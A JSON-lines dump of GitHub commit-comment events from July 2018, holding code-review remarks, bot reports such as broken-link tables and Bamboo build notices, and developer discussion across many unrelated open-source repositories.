{"id":"7995189930","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29779637,"position":null,"line":null,"path":null,"commit_id":"173eb2cc3edba8f83300d7116be9c70c9b5b6015","created_at":"2018-07-20T14:00:40Z","updated_at":"2018-07-20T14:00:40Z","author_association":"NONE","body":"Comment on 173eb2cc3edba8f83300d7116be9c70c9b5b6015.\n\nThere are 65 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 59 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 50 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/improve_diff_handling.md | 152 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 20 |\n| Broken link - unable to connect to https://developers.google.com/open-source/gsoc/faq#what_are_the_eligibility_requirements_for_participation | data/locale/en/faq/gsoc_requirements.md | 4 |\n| Broken link - unable to connect to https://coala.io/newcomer | data/locale/en/faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 19 |\n| Broken link - unable to connect to https://coala.io/#/coalaonline | reports/hemang.md | 207 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/improve_diff_handling.md | 152 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/github | _projects/add_repo_license.md | 156 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/id/faq/contact_mentor.md | 1 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 50 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 52 |\n| Broken link - unable to connect to https://coala.io/chat | partials/tabs/mentors.html | 10 |\n| Broken link - unable to connect to https://coala.io/chat | partials/tabs/mentors.html | 48 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 19 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | data/locale/en/projects/git_task_list.md | 37 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | data/locale/en/projects/git_task_list.md | 62 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 52 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 59 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to https://projects.coala.io | data/locale/en/README.md | 9 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 251 |\n| Broken link - unable to connect to https://coala.io/cep5 | _projects/implement_aspects.md | 107 |\n| Broken link - unable to connect to https://coala.io | reports/example.md | 8 |\n| Broken link - unable to connect to https://projects.coala.io | README.md | 9 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 18 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://coala.io/newcomer | _faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io/usability | _faq/gsoc_requirements.md | 7 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to https://coala.io/rebase | PULL_REQUEST_TEMPLATE.md | 25 |\n| Broken link - unable to connect to https://coala.io/review | PULL_REQUEST_TEMPLATE.md | 30 |\n| Broken link - unable to connect to https://coala.io/reviewing | PULL_REQUEST_TEMPLATE.md | 31 |\n| Broken link - unable to connect to https://coala.io | reports/adhikasp.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4940869170888704 | reports/alex.md | 8 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 18 |\n| Broken link - unable to connect to https://developer.github.com/v4/enum/reactioncontent/ | _projects/meta_review.md | 34 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | data/locale/en/projects/use_coala_3.md | 199 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | _projects/use_coala.md | 45 |\n| Broken link - unable to connect to https://help.github.com/articles/about-stars/ | _projects/use_coala.md | 66 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/gci16.fossasia.org/builds/179832299 | _projects/use_coala.md | 325 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-20T14:00:40Z"}
{"id":"7995193356","type":"CommitCommentEvent","actor":{"login":"giacomofiorin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29779641,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-20T14:01:13Z","updated_at":"2018-07-20T14:01:13Z","author_association":"MEMBER","body":"Not obviously to me.  I assume that you ran the tests before committing,\nbut they don't cover every case yet.  I'll take a look, though.  Since you\nalready pushed to master, I'll try to do it soon.\n\nOn Fri, Jul 20, 2018, 9:51 AM Jérôme Hénin <notifications@github.com> wrote:\n\n> @giacomofiorin <https://github.com/giacomofiorin> Does this change looks\n> like a problem to you?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Colvars/colvars/commit/acdf3228bc9439df108fad935cd6c20d06a0b526#commitcomment-29779501>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AETZWfXxWKM5J-aX9Q-toZpGCpkvCdYDks5uIeBXgaJpZM4VYEXO>\n> .\n>\n"}},"created_at":"2018-07-20T14:01:13Z"}
{"id":"7995194925","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779647,"position":54,"line":54,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:01:28Z","updated_at":"2018-07-20T14:01:28Z","author_association":"NONE","body":"too"}},"created_at":"2018-07-20T14:01:28Z"}
{"id":"7995197048","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29779652,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-20T14:01:50Z","updated_at":"2018-07-20T14:01:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T14:01:50Z"}
{"id":"7995198198","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29779655,"position":null,"line":null,"path":null,"commit_id":"9450abf6de8cae9956d1117fd65f86748c4c6105","created_at":"2018-07-20T14:02:01Z","updated_at":"2018-07-20T14:02:01Z","author_association":"COLLABORATOR","body":"Yeah, since things have gone well, keeping the branch around is unnecessary. We can remove it."}},"created_at":"2018-07-20T14:02:01Z"}
{"id":"7995204037","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779669,"position":50,"line":50,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:03:01Z","updated_at":"2018-07-20T14:03:01Z","author_association":"NONE","body":"fix that everywhere\r\n"}},"created_at":"2018-07-20T14:03:01Z"}
{"id":"7995206341","type":"CommitCommentEvent","actor":{"login":"ace411"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29779674,"position":13,"line":21,"path":"autoload.php","commit_id":"50a61d2d1fa704c7b2b79226c94f86f5bbd4fd81","created_at":"2018-07-20T14:03:26Z","updated_at":"2018-07-20T14:03:26Z","author_association":"OWNER","body":"Yeah. Camel case is my preferred standard for naming - I think it should transcend the code."}},"created_at":"2018-07-20T14:03:26Z"}
{"id":"7995207228","type":"CommitCommentEvent","actor":{"login":"zh-m"},"repo":{"name":"comrade-coop/wetonomy"},"payload":{"comment":{"id":29779676,"position":45,"line":40,"path":"apps/members/app/src/App.jsx","commit_id":"f955fe04ee2989ab9ae158ee1ff5f3e0af242d5d","created_at":"2018-07-20T14:03:36Z","updated_at":"2018-07-20T14:03:36Z","author_association":"COLLABORATOR","body":"Can 'member' be something else or null/undefinef? Do we need a check?"}},"created_at":"2018-07-20T14:03:36Z"}
{"id":"7995208275","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779678,"position":121,"line":121,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:03:48Z","updated_at":"2018-07-20T14:03:48Z","author_association":"NONE","body":"tautology"}},"created_at":"2018-07-20T14:03:48Z"}
{"id":"7995209031","type":"CommitCommentEvent","actor":{"login":"wortiz"},"repo":{"name":"goma/goma"},"payload":{"comment":{"id":29779684,"position":6,"line":1018,"path":"src/mm_fill_aux.c","commit_id":"9ab96b543f55e41ceced7bbf5ae31bd63bb971c8","created_at":"2018-07-20T14:03:54Z","updated_at":"2018-07-20T14:03:54Z","author_association":"CONTRIBUTOR","body":"This memset is larger than the size of hsquared"}},"created_at":"2018-07-20T14:03:54Z"}
{"id":"7995213954","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779699,"position":117,"line":117,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:04:37Z","updated_at":"2018-07-20T14:04:37Z","author_association":"NONE","body":"why so much \"section\"?"}},"created_at":"2018-07-20T14:04:37Z"}
{"id":"7995216772","type":"CommitCommentEvent","actor":{"login":"gselzer"},"repo":{"name":"imagej/tutorials"},"payload":{"comment":{"id":29779708,"position":null,"line":null,"path":null,"commit_id":"ec2bb94029485ac8be2bcfc93d4f41d6c8385434","created_at":"2018-07-20T14:05:08Z","updated_at":"2018-07-20T14:05:08Z","author_association":"NONE","body":"@imagejan will do, I did not realize this was the term. Algorithm was a guess from the `Op` javadoc. Thanks for the heads up!"}},"created_at":"2018-07-20T14:05:08Z"}
{"id":"7995216801","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779709,"position":121,"line":121,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:05:08Z","updated_at":"2018-07-20T14:05:08Z","author_association":"NONE","body":"remove empty tags"}},"created_at":"2018-07-20T14:05:08Z"}
{"id":"7995218250","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29779716,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-20T14:05:24Z","updated_at":"2018-07-20T14:05:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T14:05:24Z"}
{"id":"7995219840","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779721,"position":8,"line":8,"path":"style.css","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:05:42Z","updated_at":"2018-07-20T14:05:42Z","author_association":"NONE","body":"remove empty style-blocks"}},"created_at":"2018-07-20T14:05:42Z"}
{"id":"7995220484","type":"CommitCommentEvent","actor":{"login":"rim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29779723,"position":null,"line":null,"path":null,"commit_id":"3754280a05a5a929551e4f4faffc7f15b3fc5c94","created_at":"2018-07-20T14:05:48Z","updated_at":"2018-07-20T14:05:48Z","author_association":"CONTRIBUTOR","body":"Stable policy, guys... "}},"created_at":"2018-07-20T14:05:48Z"}
{"id":"7995221443","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29779726,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-20T14:05:59Z","updated_at":"2018-07-20T14:05:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T14:05:59Z"}
{"id":"7995224695","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779731,"position":33,"line":33,"path":"style.css","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:06:35Z","updated_at":"2018-07-20T14:06:35Z","author_association":"NONE","body":"cool! "}},"created_at":"2018-07-20T14:06:35Z"}
{"id":"7995226046","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779735,"position":50,"line":50,"path":"style.css","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:06:51Z","updated_at":"2018-07-20T14:06:51Z","author_association":"NONE","body":"add space"}},"created_at":"2018-07-20T14:06:51Z"}
{"id":"7995226175","type":"CommitCommentEvent","actor":{"login":"basecode"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29779737,"position":5,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"2b761e525328d9402ba8ff0b310e91043a0d6db8","created_at":"2018-07-20T14:06:53Z","updated_at":"2018-07-20T14:06:53Z","author_association":"NONE","body":"@develar What I see is that the logic doesn't take alias into account. E.g.: `prepackaged` has an alias `pb`. Unfortunately even if I use `prepackaged` explicitly it will be translated down the road to `pb` and ends up again in `Unknown option \"pd\"`.\r\n\r\nYou probably must add all alias to `expectedOptions` or sth."}},"created_at":"2018-07-20T14:06:53Z"}
{"id":"7995226948","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779741,"position":54,"line":54,"path":"style.css","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:07:01Z","updated_at":"2018-07-20T14:07:01Z","author_association":"NONE","body":"remove empty lines"}},"created_at":"2018-07-20T14:07:01Z"}
{"id":"7995229252","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779747,"position":80,"line":80,"path":"style.css","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T14:07:28Z","updated_at":"2018-07-20T14:07:28Z","author_association":"NONE","body":"fix paginaton"}},"created_at":"2018-07-20T14:07:28Z"}
{"id":"7995232730","type":"CommitCommentEvent","actor":{"login":"wortiz"},"repo":{"name":"goma/goma"},"payload":{"comment":{"id":29779754,"position":8,"line":1020,"path":"src/mm_fill_aux.c","commit_id":"9ab96b543f55e41ceced7bbf5ae31bd63bb971c8","created_at":"2018-07-20T14:08:07Z","updated_at":"2018-07-20T14:08:07Z","author_association":"CONTRIBUTOR","body":"This might be wrong, it looks like exodus numbers bars like:\r\n\r\n    1 --- 3 --- 2\r\n\r\nWhich means the second location should be 1 instead of ei->num_local_nodes -1\r\n"}},"created_at":"2018-07-20T14:08:07Z"}
{"id":"7995239716","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779917,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T14:09:24Z","updated_at":"2018-07-20T14:09:24Z","author_association":"NONE","body":"I'm sure this is a dumb question, but would you ever prefer a score that is a *little* less than best but at a higher depth?  Seems like +4.9 at depth 20 would be better than 5.0 at depth 19. . right?"}},"created_at":"2018-07-20T14:09:24Z"}
{"id":"7995240317","type":"CommitCommentEvent","actor":{"login":"raresica1234"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29779919,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:09:31Z","updated_at":"2018-07-20T14:09:31Z","author_association":"COLLABORATOR","body":"I tried that, I get an crash in the native part of JOML."}},"created_at":"2018-07-20T14:09:31Z"}
{"id":"7995244533","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29779925,"position":null,"line":null,"path":null,"commit_id":"3754280a05a5a929551e4f4faffc7f15b3fc5c94","created_at":"2018-07-20T14:10:18Z","updated_at":"2018-07-20T14:10:18Z","author_association":"CONTRIBUTOR","body":"This should have not landed in stable.\r\nNow we have people that have a `not null` constraint in the database. It is a problem in the following scenario:\r\n1. install a first CoA before this commit\r\n2. update your code\r\n3. install a second CoA => crash\r\n\r\nIt is too late to put the `required=True` back now so I will just restore the default value in 11.0"}},"created_at":"2018-07-20T14:10:18Z"}
{"id":"7995246822","type":"CommitCommentEvent","actor":{"login":"EdgarOmarOrtiz"},"repo":{"name":"EdgarOmarOrtiz/profile"},"payload":{"comment":{"id":29779931,"position":null,"line":null,"path":null,"commit_id":"4572cd1befd27ce0c5eba1cdd9e87b88b78f2567","created_at":"2018-07-20T14:10:43Z","updated_at":"2018-07-20T14:10:43Z","author_association":"OWNER","body":"back"}},"created_at":"2018-07-20T14:10:43Z"}
{"id":"7995246984","type":"CommitCommentEvent","actor":{"login":"Alf21"},"repo":{"name":"dsdude123/TTT2"},"payload":{"comment":{"id":29779932,"position":null,"line":null,"path":null,"commit_id":"e577a035a5dd5eccfdf1c3a32869ee1ff105412c","created_at":"2018-07-20T14:10:45Z","updated_at":"2018-07-20T14:10:45Z","author_association":"NONE","body":"With the new TTT2 v.0.2.3.2b you will be able to use the hook \"UseCustomPlayerModels\" (return true!) to do this and use own player models without modifying the code."}},"created_at":"2018-07-20T14:10:45Z"}
{"id":"7995247083","type":"CommitCommentEvent","actor":{"login":"jigarkb"},"repo":{"name":"jigarkb/Programming"},"payload":{"comment":{"id":29779933,"position":null,"line":null,"path":null,"commit_id":"7a5981cba2e9e7c0a646f93dfa1575e876c06266","created_at":"2018-07-20T14:10:46Z","updated_at":"2018-07-20T14:10:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [271 Encode and Decode Strings](https://trello.com/c/65BUSV8p/64-271-encode-and-decode-strings)"}},"created_at":"2018-07-20T14:10:46Z"}
{"id":"7995250250","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29779941,"position":14,"line":14,"path":"stand/efi/loader/multiboot2_tramp.S","commit_id":"43a53d3fdd96bc5e2a4ba2bb145a0e79b1ab85d5","created_at":"2018-07-20T14:11:19Z","updated_at":"2018-07-20T14:11:19Z","author_association":"NONE","body":"OK, but that doesn't really answer the question. I see no reason to call efi_copy_finish from the assembly code. Have you tried to do it before calling multiboot2_tramp?"}},"created_at":"2018-07-20T14:11:19Z"}
{"id":"7995252564","type":"CommitCommentEvent","actor":{"login":"jigarkb"},"repo":{"name":"jigarkb/Programming"},"payload":{"comment":{"id":29779949,"position":null,"line":null,"path":null,"commit_id":"128fe2f0ce8c114ff6930cdddd0cabcad0cde3f6","created_at":"2018-07-20T14:11:45Z","updated_at":"2018-07-20T14:11:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [351 Android Unlock Patterns](https://trello.com/c/0f3EseW5/58-351-android-unlock-patterns)"}},"created_at":"2018-07-20T14:11:45Z"}
{"id":"7995255553","type":"CommitCommentEvent","actor":{"login":"raymz21"},"repo":{"name":"raymz21/my.log"},"payload":{"comment":{"id":29779957,"position":null,"line":null,"path":null,"commit_id":"55a3b9dd6c0d009b2024080c434ff6d89fe90a05","created_at":"2018-07-20T14:12:19Z","updated_at":"2018-07-20T14:12:19Z","author_association":"OWNER","body":"delelte"}},"created_at":"2018-07-20T14:12:19Z"}
{"id":"7995259051","type":"CommitCommentEvent","actor":{"login":"featurecat"},"repo":{"name":"featurecat/lizzie"},"payload":{"comment":{"id":29779965,"position":44,"line":452,"path":"src/main/java/featurecat/lizzie/analysis/Leelaz.java","commit_id":"20611dbfdd3349204bfc14792544b62f95d97b26","created_at":"2018-07-20T14:12:58Z","updated_at":"2018-07-20T14:12:58Z","author_association":"OWNER","body":"also we should make this a Config option to display "}},"created_at":"2018-07-20T14:12:58Z"}
{"id":"7995262422","type":"CommitCommentEvent","actor":{"login":"jhenin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29779972,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-20T14:13:36Z","updated_at":"2018-07-20T14:13:36Z","author_association":"MEMBER","body":"The tests run. My concern was more a design decision along the lines of: how do we handle this situation where PDB flags are not required (because the atom group is already defined) but the user provides them. With this change the PDB flags override the known atom numbers. Before this, it was an error condition with a message that was hard to relate to the actual problem."}},"created_at":"2018-07-20T14:13:36Z"}
{"id":"7995264461","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29779975,"position":75,"line":104,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:13:59Z","updated_at":"2018-07-20T14:13:59Z","author_association":"NONE","body":"The issue I have with this modifier is that it will make you `SLOAD` `balances[msg.sender]` twice. Whereas if you were doing the same in the function body, or using `SafeMath`, you would do this expensive operation only once."}},"created_at":"2018-07-20T14:13:59Z"}
{"id":"7995266852","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-api"},"payload":{"comment":{"id":29779987,"position":18,"line":null,"path":"route/routes.go","commit_id":"14a0d2f0bd5d66c0c483af9b285d381d9e982982","created_at":"2018-07-20T14:14:25Z","updated_at":"2018-07-20T14:14:25Z","author_association":"CONTRIBUTOR","body":"Pas besoin de ce commentaire c'est comme ça que ça fonctionne pour le reste :)"}},"created_at":"2018-07-20T14:14:25Z"}
{"id":"7995268839","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29779990,"position":1,"line":null,"path":"1532096085.97/github_test.txt","commit_id":"e3ceb16e8d3c3e14ba86b612899e2c9faaad1854","created_at":"2018-07-20T14:14:48Z","updated_at":"2018-07-20T14:14:48Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-20T14:14:48Z"}
{"id":"7995269406","type":"CommitCommentEvent","actor":{"login":"develar"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29779991,"position":5,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"2b761e525328d9402ba8ff0b310e91043a0d6db8","created_at":"2018-07-20T14:14:53Z","updated_at":"2018-07-20T14:14:53Z","author_association":"MEMBER","body":"@basecode `prepackaged` has alias `pd` and it is deleted https://github.com/electron-userland/electron-builder/commit/2145fa114ea0b173c22756e63f27b3ef7aa54a45\r\n\r\nI have added additional test case :) https://github.com/electron-userland/electron-builder/commit/40f496397c411836ca1edfcf46d1654aa70f9e62"}},"created_at":"2018-07-20T14:14:53Z"}
{"id":"7995271974","type":"CommitCommentEvent","actor":{"login":"felixdivo"},"repo":{"name":"hardbyte/python-can"},"payload":{"comment":{"id":29779997,"position":5,"line":28,"path":"doc/interfaces.rst","commit_id":"6735a0ea753b70c19cf098fbb131daffcb1258df","created_at":"2018-07-20T14:15:21Z","updated_at":"2018-07-20T14:15:21Z","author_association":"COLLABORATOR","body":"Uhm, I don't know. I never actually looked at the pluggy thing. But `can.interface` makes sense as an entry point, since that's where all the other interfaces are, right? I think I don't get the problem ..."}},"created_at":"2018-07-20T14:15:21Z"}
{"id":"7995272080","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-api"},"payload":{"comment":{"id":29779998,"position":4,"line":null,"path":"manager/fleetManager.go","commit_id":"14a0d2f0bd5d66c0c483af9b285d381d9e982982","created_at":"2018-07-20T14:15:22Z","updated_at":"2018-07-20T14:15:22Z","author_association":"CONTRIBUTOR","body":"J'aurais mis fleetmanager dans le dossier ship pour le moment, sinon tu vas avoir un problème d'import circulaire"}},"created_at":"2018-07-20T14:15:22Z"}
{"id":"7995273819","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29780004,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T14:15:42Z","updated_at":"2018-07-20T14:15:42Z","author_association":"OWNER","body":"Yes, I'd prefer +4.9 at depth 20 over 5.0 at depth 19. I think score is irrelevant in terms of picking which search gives the more accurate result."}},"created_at":"2018-07-20T14:15:42Z"}
